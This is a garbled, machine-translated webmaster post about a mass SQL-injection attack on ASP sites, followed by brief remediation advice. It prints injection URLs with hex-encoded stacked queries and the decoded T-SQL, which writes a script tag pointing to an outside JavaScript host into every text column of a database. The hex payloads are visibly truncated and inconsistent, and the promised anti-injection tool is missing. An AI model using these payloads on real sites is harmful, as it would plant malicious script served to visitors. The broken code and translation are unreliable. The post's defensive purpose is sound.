Solution of

Source: Internet
Author: User

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

Recently, there is a virus through SQL vulnerabilities, directly into the database table

Http://xxx.xxx.xxx/xxx.asp?xxx=xxx ' and (SElEcT ChAr) +cast (CoUnT (1) as VaRcHaR (100))

+char from [MAsTeR]. [sysdatabases]) >0 and ' = '

Second use
http://xxx.xxx.xxx/xxx.asp?xxx=xxx% ' and (SElEcT ChAr) +cast (CoUnT (1) as VaRcHaR (100))

+char from [MAsTeR]. [sysdatabases]) >0 and '% ' = '

Third use
Http://xxx.xxx.xxx/xxx.asp?xxx=xxx;dEcLaRe @S VaRcHaR (4000) SeT @s=cast

(0X4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C4

15245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616

D3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f4

37572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c40432

36e2f636e2e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437

572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f4

3415445205461626c655f437572736f72 as VaRcHaR (4000)), EXeC (@s);

Fourth time use
[url=http://xxx.xxx.xxx/xxx.asp?xxx=xxx%]http://xxx.xxx.xxx/xxx.asp?xxx=xxx% ' [url];d eclare

@S VaRcHaR (4000) SeT @s=cast

(0X4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C4

15245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616

37572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c40432

572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f4

3415445205461626c655f437572736f72 as VaRcHaR (4000)), EXeC (@s);--and '% ' = '

Fifth time use
Http://xxx.xxx.xxx/xxx.asp?xxx=xxx ';d eclare @S VaRcHaR (4000) SeT @s=cast

(0X4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C4

15245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616

92c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f636e2e64617869613132332e6

36e2f636e2e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437

572736f7220494e544f24e4420434c4f5345205461626c655f437572736f72204445414c4c4f4

3415445205461626c655f437572736f72 as VaRcHaR (4000)), EXeC (@s);

These binary encodings are:
DECLARE @T VARCHAR (255), @c VARCHAR (255)
DECLARE Table_cursor Cursor for
SELECT a.name,b.name from sysobjects a,syscolumns b
WHERE a.id=b.id and a.xtype= ' U ' and (b.xtype=99 or b.xtype=35 or b.xtype=231)
OPEN Table_cursor
FETCH NEXT from Table_cursor into @t,@c
while (@ @FETCH_STATUS =0) BEGIN EXEC (' UPDATE [' +@t+ '] SET [' +@c+ ']=rtrim (CONVERT VARCHAR

(4000), [' +@c+ '])] + ' <script src=http://cn.daxia123.cn/cn.js></script> ')
FETCH NEXT from Table_cursor to @t,@c end
Close Table_cursor deallocate table_cursor

The destruction of this method is very serious! That is, we have found the reason, because of the use of program vulnerabilities in the parameter page for SQL injection, fortunately, these binary encodings, Access database is ineffective, because the Access database does not have the ability to decompile, So many websites avoid being attacked.

Well, along the way, we found the principle of invasion, then we have to solve the problem now, first of all, we have to stop the site, the problem of the page (preferably a check), is the page with parameters, not the number of characters to make judgments, this is only the first step, Then do the conn file of the anti-injection code. And then restore the data!

If it is their own server, please be sure to carefully scan the system, because even with the early attack, may be worth the Trojan to the server, and then Rob 3389 permissions, your server as a meat machine to attack the machines around you.

OK, here is a SQL Universal anti-injection system 3.0 for your reference. I hope everyone's problems can be resolved in time, resolutely and everyone together to tide over the difficulties, finally, www.bookskys.com webmaster in advance to wish you happy Spring Festival!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.